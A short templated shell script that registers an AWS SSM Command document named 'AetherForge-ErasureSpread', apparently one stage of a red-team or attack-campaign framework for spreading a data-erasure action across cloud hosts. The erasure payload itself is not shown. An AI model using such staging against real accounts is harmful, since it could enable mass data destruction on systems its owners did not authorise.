#!/bin/sh AWS_CLI="${AWS_CLI:-aws}" DOC_DIR="$(cd "$(dirname "$0")" && pwd)" DOC_NAME="AetherForge-ErasureSpread-{{BUILD_ID}}" "$AWS_CLI" ssm create-document --name "$DOC_NAME" --document-type "Command" --content "file://${DOC_DIR}/document.json" --tags "Key=Campaign,Value={{CAMPAIGN}}" "Key=Lane,Value=ssm_document"